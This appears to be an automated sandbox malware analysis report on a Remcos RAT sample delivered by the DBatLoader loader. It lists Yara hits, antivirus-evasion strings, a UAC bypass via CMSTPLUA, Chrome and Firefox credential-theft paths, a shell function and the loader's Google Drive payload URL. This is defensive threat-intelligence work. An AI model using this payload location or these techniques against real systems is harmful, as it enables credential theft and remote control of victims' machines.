Source: Amcache.hve.14.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp, Amcache.hve.14.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data		11_2_0320BA4D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data		21_2_02E8BA4D

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	11_2_0320BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \key3.db	11_2_0320BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	21_2_02E8BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \key3.db	21_2_02E8BB6B

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR

Contains functionality to launch a control a shell (cmd.exe)

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: cmd.exe		11_2_0320569A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: cmd.exe		21_2_02E8569A

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.181.129	drive.usercontent.google.com	United States		15169	GOOGLEUS	false

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
drive.usercontent.google.com	142.250.181.129	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://drive.usercontent.google.com/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi	false		high

AV Detection

Antivirus / Scanner detection for submitted sample

Source: nft438A5fN.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\Public\Libraries\Wuqtggvo.PIF

Avira: detection malicious, Label: TR/AD.Nekark.iteef

Found malware configuration

Source: nft438A5fN.exe

Malware Configuration Extractor: DBatLoader {"Download Url": ["https://drive.usercontent.google.com/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	ReversingLabs: Detection: 57%
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Virustotal: Detection: 68%			Perma Link

Multi AV Scanner detection for submitted file

Source: nft438A5fN.exe	ReversingLabs: Detection: 57%
Source: nft438A5fN.exe	Virustotal: Detection: 68%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\Public\Libraries\Wuqtggvo.PIF

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: nft438A5fN.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_032338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		11_2_032338C8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EB38C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		21_2_02EB38C8

Source: nft438A5fN.exe

Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03207538 _wcslen,CoGetObject,		11_2_03207538
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E87538 _wcslen,CoGetObject,		21_2_02E87538

Uses 32bit PE files

Source: nft438A5fN.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown

HTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.8:49706 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: nft438A5fN.exe, nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1613117060.0000000002346000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.00000000395DE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1585864121.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000A.00000002.1599731448.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000002.1715376572.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000018.00000000.1733704656.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001B.00000002.1750139322.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001C.00000000.1755754278.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.5.dr
Source:	Binary string: ping.pdbGCTL source: esentutl.exe, 00000006.00000003.1589575934.0000000005850000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000010.00000002.1712179050.00000000000F1000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.6.dr
Source:	Binary string: easinvoker.pdbH source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1592952655.000000003A53F000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1613117060.0000000002346000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1592952655.000000003A510000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.00000000395DE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000F.00000002.1715376572.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000018.00000000.1733704656.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001B.00000002.1750139322.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001C.00000000.1755754278.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.5.dr
Source:	Binary string: ping.pdb source: esentutl.exe, 00000006.00000003.1589575934.0000000005850000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000010.00000002.1712179050.00000000000F1000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.6.dr

Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C95908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	0_2_02C95908
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00050207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	7_2_00050207
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0005589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	7_2_0005589A
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00063E66 FindFirstFileW,FindNextFileW,FindClose,	7_2_00063E66
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00054EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	7_2_00054EC1
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0004532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	7_2_0004532E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0321C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	11_2_0321C322
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0320C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	11_2_0320C388
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0320928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_0320928E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_032096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_032096A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0320BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	11_2_0320BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03219B86 FindFirstFileW,FindNextFileW,FindNextFileW,	11_2_03219B86
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03207877 FindFirstFileW,FindNextFileW,	11_2_03207877
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03208847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	11_2_03208847
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0324E8F9 FindFirstFileExA,	11_2_0324E8F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0320BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	11_2_0320BD72
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0005589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	15_2_0005589A
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00050207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	15_2_00050207
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00063E66 FindFirstFileW,FindNextFileW,FindClose,	15_2_00063E66
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00054EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	15_2_00054EC1
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0004532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	15_2_0004532E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E8928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	21_2_02E8928E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E8C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	21_2_02E8C388
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E9C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	21_2_02E9C322
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E896A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	21_2_02E896A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E99B86 FindFirstFileW,FindNextFileW,FindNextFileW,	21_2_02E99B86
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E8BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	21_2_02E8BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02ECE8F9 FindFirstFileExA,	21_2_02ECE8F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E87877 FindFirstFileW,FindNextFileW,	21_2_02E87877
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E88847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	21_2_02E88847
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E8BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	21_2_02E8BD72

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_03207CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

11_2_03207CD2

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://drive.usercontent.google.com/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi

Contains functionality to check if a connection to the internet is available

Source: C:\Users\user\Desktop\nft438A5fN.exe

Code function: 0_2_02CAE4B8 InternetCheckConnectionA,

0_2_02CAE4B8

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 142.250.181.129:443

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_03216676 Sleep,URLDownloadToFileW,

11_2_03216676

Source: global traffic

DNS traffic detected: DNS query: drive.usercontent.google.com

Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: colorcpl.exe	String found in binary or memory: http://geoplugin.net/json.gp
